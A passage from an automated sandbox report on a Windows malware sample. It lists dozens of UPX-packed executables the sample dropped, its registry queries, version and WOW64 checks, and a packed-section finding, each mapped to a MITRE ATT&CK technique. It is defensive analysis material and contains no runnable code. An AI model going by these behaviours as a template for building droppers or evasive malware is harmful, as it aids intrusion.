\"hrhfdtt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hrhfdtt.exe]- [targetUID: 00000000-00003748]\n \"xrfpvx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xrfpvx.exe]- [targetUID: 00000000-00001844]\n \"4640626.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4640626.exe]- [targetUID: 00000000-00000708]\n \"8024466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8024466.exe]- [targetUID: 00000000-00001604]\n \"0806624.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0806624.exe]- [targetUID: 00000000-00001604]\n \"042464.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\042464.exe]- [targetUID: 00000000-00000888]\n \"604420.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\604420.exe]- [targetUID: 00000000-00001656]\n \"4288806.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4288806.exe]- [targetUID: 00000000-00001656]\n \"24226.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24226.exe]- [targetUID: 00000000-00003624]\n \"00644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00644.exe]- [targetUID: 00000000-00003996]\n \"408822.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\408822.exe]- [targetUID: 00000000-00003448]\n \"vldfrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vldfrx.exe]- [targetUID: 00000000-00003448]\n \"jbvvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jbvvj.exe]- [targetUID: 00000000-00000608]\n \"xxlthnt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xxlthnt.exe]- [targetUID: 00000000-00000608]\n \"bdvpj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bdvpj.exe]- [targetUID: 00000000-00002152]\n \"thntdfd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thntdfd.exe]- [targetUID: 00000000-00002152]\n \"648268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\648268.exe]- [targetUID: 00000000-00000656]\n \"0080208.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0080208.exe]- [targetUID: 00000000-00005392]\n \"62266.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\62266.exe]- [targetUID: 00000000-00005392]\n \"484088.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\484088.exe]- [targetUID: 00000000-00001856]\n \"0064284.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0064284.exe]- [targetUID: 00000000-00001856]\n \"fbtltj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fbtltj.exe]- [targetUID: 00000000-00003500]\n \"rxvhlp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rxvhlp.exe]- [targetUID: 00000000-00001852]\n \"ftvfbtx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ftvfbtx.exe]- [targetUID: 00000000-00001852]\n \"xvnnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xvnnn.exe]- [targetUID: 00000000-00002444]\n \"dxrftlp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dxrftlp.exe]- [targetUID: 00000000-00003260]\n \"dppbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dppbn.exe]- [targetUID: 00000000-00003260]\n \"hnbnnnb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hnbnnnb.exe]- [targetUID: 00000000-00003680]\n \"nvrtbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nvrtbh.exe]- [targetUID: 00000000-00003228]\n \"880202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\880202.exe]- [targetUID: 00000000-00003228]\n \"882066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\882066.exe]- [targetUID: 00000000-00005072]\n \"626400.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\626400.exe]- [targetUID: 00000000-00005072]\n \"bnjjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnjjv.exe]- [targetUID: 00000000-00006092]\n \"pxjrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pxjrr.exe]- [targetUID: 00000000-00006120]\n \"8844064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8844064.exe]- [targetUID: 00000000-00006120]\n \"jrfxlf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jrfxlf.exe]- [targetUID: 00000000-00004648]\n \"plfthj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\plfthj.exe]- [targetUID: 00000000-00002116]\n \"xvdbp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xvdbp.exe]- [targetUID: 00000000-00002116]\n \"njljtn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\njljtn.exe]- [targetUID: 00000000-00002220]\n \"xrnbdjd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xrnbdjd.exe]- [targetUID: 00000000-00005188]\n \"06224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06224.exe]- [targetUID: 00000000-00004268]\n \"26802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\26802.exe]- [targetUID: 00000000-00004268]\n \"06484.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06484.exe]- [targetUID: 00000000-00005352]\n \"242680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\242680.exe]- [targetUID: 00000000-00005352]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"EDEBB225CD0EF02D994548662C6DFF2A521857EAA549F997B51871A32B0396D0\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003100606e31005b6e3100000000000000000000002f0000000001ecdf12000000000050ed120095e14e77a4544000feffffff435c527750595277aa000000b80000005a6e3100586e310074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c517760d84175ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed5277826e3100a06a28758600000074e11200ace512000000000086008800a06a287574e11200916c2875826e3100a06a2875a06a2875e4e5120002020000 (UID: 00000000-00005476)\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005476)\n \"242680.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005352)\n \"242680.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00c0c12d00bbc12d00000000000000000000002600000000011ce312000000000080f0120095e14e770e594000feffffff435c527750595277aa000000b8000000bac12d00b8c12d00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000026001c5c517760d84175ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5277e2c12d00a06a287586000000a4e41200dce812000000000086008800a06a2875a4e41200916c2875e2c12d00a06a2875a06a287514e9120002020000 (UID: 00000000-00005352)\n \"242680.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005352)\n \"06484.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002200683b2200633b2200000000000000000000001a00000000011ce312000000000080f0120095e14e77305f4000feffffff435c527750595277aa000000b8000000623b2200603b2200a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c517760d84175ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed52778a3b2200a06a287586000000a4e41200dce812000000000086008800a06a2875a4e41200916c28758a3b2200a06a2875a06a287514e9120002020000 (UID: 00000000-00003928)\n \"06484.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003928)\n \"26802.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004268)\n \"26802.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b00b0762b00ab762b00000000000000000000002300000000011ce312000000000080f0120095e14e771a5e4000feffffff435c527750595277aa000000b8000000aa762b00a8762b00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c517760d84175ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5277d2762b00a06a287586000000a4e41200dce812000000000086008800a06a2875a4e41200916c2875d2762b00a06a2875a06a287514e9120002020000 (UID: 00000000-00004268)\n \"26802.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004268)\n \"06224.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a00a83b2a00a33b2a00000000000000000000002200000000011ce312000000000080f0120095e14e773c5c4000feffffff435c527750595277aa000000b8000000a23b2a00a03b2a00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c517760d84175ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5277ca3b2a00a06a287586000000a4e41200dce812000000000086008800a06a2875a4e41200916c2875ca3b2a00a06a2875a06a287514e9120002020000 (UID: 00000000-00005168)\n \"06224.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005168)\n \"xrnbdjd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005188)\n \"xrnbdjd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002000003b2000fb3a2000000000000000000000001800000000011ce312000000000080f0120095e14e7786404000feffffff435c527750595277aa000000b8000000fa3a2000f83a2000a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000018001c5c517760d84175ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5277223b2000a06a287586000000a4e41200dce812000000000086008800a06a2875a4e41200916c2875223b2000a06a2875a06a287514e9120002020000 (UID: 00000000-00005188)\n \"xrnbdjd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005188)\n \"njljtn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e00e83b1e00e33b1e00000000000000000000001600000000011ce312000000000080f0120095e14e7748464000feffffff435c527750595277aa000000b8000000e23b1e00e03b1e00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c517760d84175ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed52770a3c1e00a06a287586000000a4e41200dce812000000000086008800a06a2875a4e41200916c28750a3c1e00a06a2875a06a287514e9120002020000 (UID: 00000000-00002220)\n \"njljtn.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002220)\n \"xvdbp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003600f03d3600eb3d3600000000000000000000002e00000000011ce312000000000080f0120095e14e77b2454000feffffff435c527750595277aa000000b8000000ea3d3600e83d3600a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c517760d84175ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5277123e3600a06a287586000000a4e41200dce812000000000086008800a06a2875a4e41200916c2875123e3600a06a2875a06a287514e9120002020000 (UID: 00000000-00002116)\n \"xvdbp.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002116)\n \"plfthj.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003000403c30003b3c3000000000000000000000002800000000011ce312000000000080f0120095e14e77ab444000feffffff435c527750595277aa000000b80000003a3c3000383c3000a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c517760d84175ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5277623c3000a06a287586000000a4e41200dce812000000000086008800a06a2875a4e41200916c2875623c3000a06a2875a06a287514e9120002020000 (UID: 00000000-00005664)\n \"plfthj.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005664)\n \"jrfxlf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004648)\n \"jrfxlf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d0048c81d0043c81d00000000000000000000001600000000011ce312000000000080f0120095e14e77954b4000feffffff435c527750595277aa000000b800000042c81d0040c81d00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000016001c5c517760d84175ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed52776ac81d00a06a287586000000a4e41200dce812000000000086008800a06a2875a4e41200916c28756ac81d00a06a2875a06a287514e9120002020000 (UID: 00000000-00004648)\n \"jrfxlf.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004648)\n \"8844064.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"242680.exe\" called \"IsWow64Process\" with parameter \"5352\" - (UID: 00000000-00005352)\n \"26802.exe\" called \"IsWow64Process\" with parameter \"4268\" - (UID: 00000000-00004268)\n \"xrnbdjd.exe\" called \"IsWow64Process\" with parameter \"5188\" - (UID: 00000000-00005188)\n \"jrfxlf.exe\" called \"IsWow64Process\" with parameter \"4648\" - (UID: 00000000-00004648)\n \"8844064.exe\" called \"IsWow64Process\" with parameter \"6120\" - (UID: 00000000-00006120)\n \"pxjrr.exe\" called \"IsWow64Process\" with parameter \"6092\" - (UID: 00000000-00006092)\n \"bnjjv.exe\" called \"IsWow64Process\" with parameter \"3796\" - (UID: 00000000-00003796)\n \"626400.exe\" called \"IsWow64Process\" with parameter \"5072\" - (UID: 00000000-00005072)\n \"880202.exe\" called \"IsWow64Process\" with parameter \"3228\" - (UID: 00000000-00003228)\n \"nvrtbh.exe\" called \"IsWow64Process\" with parameter \"3680\" - (UID: 00000000-00003680)\n \"dppbn.exe\" called \"IsWow64Process\" with parameter \"3260\" - (UID: 00000000-00003260)\n \"xvnnn.exe\" called \"IsWow64Process\" with parameter \"3456\" - (UID: 00000000-00003456)\n \"fbtltj.exe\" called \"IsWow64Process\" with parameter \"692\" - (UID: 00000000-00000692)\n \"0080208.exe\" called \"IsWow64Process\" with parameter \"656\" - (UID: 00000000-00000656)\n \"thntdfd.exe\" called \"IsWow64Process\" with parameter \"2152\" - (UID: 00000000-00002152)\n \"xxlthnt.exe\" called \"IsWow64Process\" with parameter \"608\" - (UID: 00000000-00000608)\n \"vldfrx.exe\" called \"IsWow64Process\" with parameter \"3448\" - (UID: 00000000-00003448)\n \"4288806.exe\" called \"IsWow64Process\" with parameter \"1656\" - (UID: 00000000-00001656)\n \"8024466.exe\" called \"IsWow64Process\" with parameter \"708\" - (UID: 00000000-00000708)\n \"xrfpvx.exe\" called \"IsWow64Process\" with parameter \"1844\" - (UID: 00000000-00001844)\n \"0824600.exe\" called \"IsWow64Process\" with parameter \"3028\" - (UID: 00000000-00003028)\n \"8280068.exe\" called 